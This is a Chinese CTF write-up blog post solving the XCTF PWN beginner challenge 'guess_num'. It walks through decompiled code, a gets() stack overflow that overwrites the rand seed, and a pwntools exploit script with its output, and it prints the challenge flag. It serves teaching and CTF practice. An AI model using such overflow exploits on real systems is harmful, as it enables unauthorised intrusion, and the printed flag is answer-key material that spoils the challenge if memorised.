攻防世界-wp-PWN-新手区-3-guess_num

最新推荐文章于 2022-06-01 08:00:08 发布
最新推荐文章于 2022-06-01 08:00:08 发布
阅读量1.5k 收藏 2
点赞数 2
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45161658/article/details/113683520
版权

题目描述:

菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么

题目场景:

220.249.52.133:35323

题目附件:

b59204f56a0545e8a22f8518e749f19f

题目思路:

随机函数生成的随机数并不是真的随机数,他们只是在一定范围内随机,实际上是一段数字的循环,这些数字取决于随机种子。

解题过程:

载入IDA64,找到main函数,F5反编译得到伪C代码,发现输入v8名字时可以覆盖sreed[0],这样这个随机数列就可控了。

__int64 __fastcall main(__int64 a1, char **a2, char **a3){
  FILE *v3; // rdi
  int v5; // [rsp+4h] [rbp-3Ch]
  int i; // [rsp+8h] [rbp-38h]
  int v7; // [rsp+Ch] [rbp-34h]
  char v8; // [rsp+10h] [rbp-30h]
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]
  unsigned __int64 v10; // [rsp+38h] [rbp-8h]
  v10 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  v3 = stderr;
  setbuf(stderr, 0LL);
  v5 = 0;
  v7 = 0;
  *(_QWORD *)seed = sub_BB0(v3, 0LL);
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:");
  gets(&v8);
  srand(seed[0]);
  for ( i = 0; i <= 9; ++i ){
    v7 = rand() % 6 + 1;
    printf("-------------Turn:%d-------------\n", (unsigned int)(i + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &v5);
    puts("---------------------------------");
    if ( v5 != v7 ){
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  sub_C3E();
  return 0LL;
}

进入v8,var_30在栈中占0x20,也就是十进制的32,可以覆盖到seed。如果使输入的guessnumber,即v5=v7=随机数%6+1,即可运行sub_C3E得到flag

-0000000000000030 var_30          db ?
    ......
-0000000000000011                 db ? ; undefined
-0000000000000010 seed            dd 2 dup(?)
-0000000000000008 var_8           dq ?
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables

在调用rand()函数时,必须先利用srand()设好随机数种子,如果未设随机数种子,rand()在调用时会自动设随机数种子为1。

方法一:使用python标准库中自带的ctypes模块进行python和c的混合编程。
第7行的lib/x86_64-linux-gnu/libc.so.6文件相当于windows 的*.dll,属于动态运行库。
第8行的p32(0x1)也可以换成p64(0x1),因为p32是转化成4字节,p64是转化成8字节,在参数是数字的情况下是相等的。

from pwn import *
from ctypes import *
io = remote("220.249.52.133","35323")
#io = process('./guess_num')#本地调试
#elf = ELF('./guess_num')#在脚本中通过elf文件查找
#libc = elf.libc
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")#使用ldd查找
payload = "a" * 0x20 + p32(0x1)
io.recvuntil('Your name:')
io.sendline(payload)
libc.srand(0x1)
for i in range(10):
    num = str(libc.rand()%6+1)
    io.recvuntil('number:')
    io.sendline(num)
io.interactive()
'''giantbranch@ubuntu:~/Desktop$ python 1.py 
[+] Opening connection to 220.249.52.133 on port 35323: Done
[*] Switching to interactive mode
---------------------------------
Success!
You are a prophet!
Here is your flag!cyberpeace{607af6232982005da7c903b914da26f7}
[*] Got EOF while reading in interactive'''

方法二:本地编写一个python程序,使用0x61616161作为种子来生成随机数列。

from ctypes import *
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
libc.srand(0x61616161)
for i in range(10):
    num = libc.rand()%6+1
    print(num)

0x61616161是a,所以在输入名字时输入很长的a就可以溢出覆盖随机种子。按照输出的顺序输入数字就可以得到flag

giantbranch@ubuntu:~/Desktop$ nc 220.249.52.133 35323
-------------------------------
Welcome to a guess number game!
-------------------------------
Please let me know your name!
Your name:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......
-------------Turn:10-------------
Please input your guess number:2
---------------------------------
Success!
You are a prophet!
Here is your flag!cyberpeace{607af6232982005da7c903b914da26f7}
*** stack smashing detected ***: ./guess_num terminated

cyberpeace{607af6232982005da7c903b914da26f7}

Scorpio-m7
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
pwntools使用简介
jmp esp
05-07 4万+
0x01 pwntools?pwntools是一个ctf框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。pwntools下载:https://pwntools.com/ 文档在线:http://pwntools.readthedocs.io/en/latest/0x02 使用简介官网的一个简单样例from pwn import * contex
Windows 2000缓冲溢出入门
03-29 1131
--[ 前言 我在互联网上阅读过许多关于缓冲溢出的文章。其中的绝大多 数都是基于*NIX操作系统平台的。后来有幸拜读了ipxodi所著的 《Windows系统下的堆栈溢出》(已刊登在绿盟网络安全月刊2000 年第三期中),又碰巧看到了Jason先生的 《Windows NT Buffer Overflows From Start to Finish》, 得益匪浅。在翻译Jason先生的文章时,
[攻防世界]guess_num
逆向萌新的博客
06-01 674
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
Windows 2000缓冲溢出入门(我所找到的最好的入门教程)
yztgx的专栏
10-11 2406
Windows 2000缓冲溢出入门作者:Jason整理:Backend backend@nsfocus.com >主页:http://www.nsfocus.com日期:2000-04-12前言我在互联网上阅读过许多关于缓冲溢出的文章。其中的绝大多数都是基于*NIX操作系统平台的。后来有幸拜读了ipxodi所著的《Windows系统下的堆栈溢出》(已刊登在绿盟网络安全月刊2000
(wp)攻防世界PWN——guess_num
0pt1mus
04-02 1127
转载自个人博客0pt1mus 好久没有做PWN题了,今天开始做一下,把之前的东西捡起来,同时对之前有些知识点也有了新的认识,新的理解。 分析 首先将附件下载下来,同时通过nc连接一下,了解一下大致的流程。 可以看到,先让我们输入用户名,然后输入猜的的数字。 然后常规操作,通过file和checksec工具判断文件类型和开启了那些防护措施。 可以知道这是一个64位的linux程序,并且开启了部分...
WINDOWS溢出资料
南京程序员俱乐部
12-03 3331
原著:Jason 翻译/整理/改编:backend 2000年4月12日   --[ 前言 我在互联网上阅读过许多关于缓冲溢出的文章。其中的绝大多数都是基于*NIX操作系统平台的。后来有幸拜读了ipxodi所著的《Windows系统下的堆栈溢出》(已刊登在绿盟网络安全月刊2000年第三期中),又碰巧看到了Jason先生的《Windows NT Buffer Over
缓冲溢出就是这么简单
zhangyonzhi的专栏
02-12 214
在下面的叙述中,所有的缓冲实验均在Microsoft Visual C++ 6.0 ,Microsoft Windows XP( 版本:5.1 Build 2600 Service Pack 3 )环境下调试、测试的。 论坛的大多数朋友可能没有利用缓冲溢出漏洞的经历,今天我给大家简单示范一下缓冲溢出。 为了尽量简化问题,我自己准备了几个有溢出漏洞的程序。你可以在附件中找到它们。 一个...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位赛-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位赛-9 pwn二进制
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
总结windows下堆溢出的三种利用方式(1)
要饭's Blog
06-28 2083
main (int argc, char *argv[]) { char *buf1, *buf2; char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/x03/x00/x05/x00/x00/x01/x08/x00/x11/x11/x11/x11/x21/x21/x21/x21"; buf1 = (char*)malloc (32); /* 分配两块内存
Linux 二进制漏洞挖掘入门系列之(一)栈溢出
个人笔记
08-17 2237
0x10 环境 gdb-peda 插件,用来调试程序时,高亮不同寄存器,堆栈的地址和数据 Windows 环境下的 IDA Pro,强大的交互式反汇编工具 测试程序(即带有栈溢出漏洞的二进制可执行文件) 虚拟机装有 Linux 发行版,例如 Ubuntu、Kali,用来运行测试程序 测试程序下载地址 1 链接:https://pan.baidu.com/s/1U3ktIz-veMuktuts...
Exploit Development – 使用SEH绕过Security Cookie
好记性不如烂笔头
12-18 3227
前面我们介绍在关闭/GS和DEP的情况下,如何利用栈溢出来实现exploit。下面我们会开启/GS,以及介绍突破/GS的常用手法。
攻防世界guess_num
Rt1Text的博客
03-27 504
题目 一点信息:猜数字 虚拟机里checksec
攻防世界-guess_num
qq_45771413的博客
04-23 469
查看保护 好家伙,不留活口(;´д`)ゞ IDA 逻辑很简单,输入名字后,程序会生成一个随机数种子,然后循环10次以下操作: 输入一个数,这个数和本次随机循环数值除以6的余数+1是否相等,相等则跳转到函数 sub_C3E() ,这里面直接有 system(“cat flag”); 分析 10次随机数必不能每次都对,所以得想办法绕过随机数或者修改随机数种子,让其种子固定则其生成的随机数也固定。 本体最有可能栈溢出的地方就是gets,gets获取输入存到v7,进入v7看看有没有漏洞: 可以看到v7下面就是s
攻防世界pwn-guess_num
a_silly_coder的博客
01-15 1567
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界pwn-forgot
08-10
- *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Scorpio-m7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值